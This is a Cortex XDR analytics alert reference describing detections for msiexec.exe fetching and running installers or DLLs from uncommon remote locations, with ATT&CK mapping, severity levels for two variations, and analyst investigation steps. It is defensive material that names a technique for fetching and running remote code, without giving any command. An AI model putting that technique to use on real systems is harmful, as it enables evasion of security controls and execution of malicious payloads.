Msiexec execution of an executable from an uncommon remote location

Cortex XDR Analytics Alert Reference by Alert name

Product
Cortex XDR
Last date published
2024-09-24
Category
Analytics Alert Reference
Order
Alert name

Synopsis

Activation Period

14 Days

Training Period

30 Days

Test Period

N/A (single event)

Deduplication Period

7 Days

Required Data

  • Requires:
    • XDR Agent

Detection Modules

Detector Tags

ATT&CK Tactic

Defense Evasion (TA0005)

ATT&CK Technique

System Binary Proxy Execution: Msiexec (T1218.007)

Severity

Informational

Description

Msiexec is the command-line utility for the Windows Installer. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads from remote locations.

Attacker's Goals

Evading security controls and executing arbitrary files from the web.

Investigative actions

  • Check execution of msiexec and the IP/Domain that used.
  • Is the URL that is encoded in the command line trusted.
  • Is executed DLL or MSI file known as legitimate.
  • Is the initiating process legitimate and the user running it knows of its use.

Variations

Msiexec execution of an executable from an uncommon remote location with a specific port

Synopsis

ATT&CK Tactic

Defense Evasion (TA0005)

ATT&CK Technique

System Binary Proxy Execution: Msiexec (T1218.007)

Severity

High

Description

Msiexec is the command-line utility for the Windows Installer. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads from remote locations.

Attacker's Goals

Evading security controls and executing arbitrary files from the web.

Investigative actions

  • Check execution of msiexec and the IP/Domain that used.
  • Is the URL that is encoded in the command line trusted.
  • Is executed DLL or MSI file known as legitimate.
  • Is the initiating process legitimate and the user running it knows of its use.


Msiexec execution of an executable from an uncommon remote location without properties

Synopsis

ATT&CK Tactic

Defense Evasion (TA0005)

ATT&CK Technique

System Binary Proxy Execution: Msiexec (T1218.007)

Severity

Medium

Description

Msiexec is the command-line utility for the Windows Installer. Adversaries may abuse msiexec.exe to proxy execution of malicious payloads from remote locations. Execution without properties is more common in malware.

Attacker's Goals

Evading security controls and executing arbitrary files from the web.

Investigative actions

  • Check execution of msiexec and the IP/Domain that used.
  • Is the URL that is encoded in the command line trusted.
  • Is executed DLL or MSI file known as legitimate.
  • Is the initiating process legitimate and the user running it knows of its use.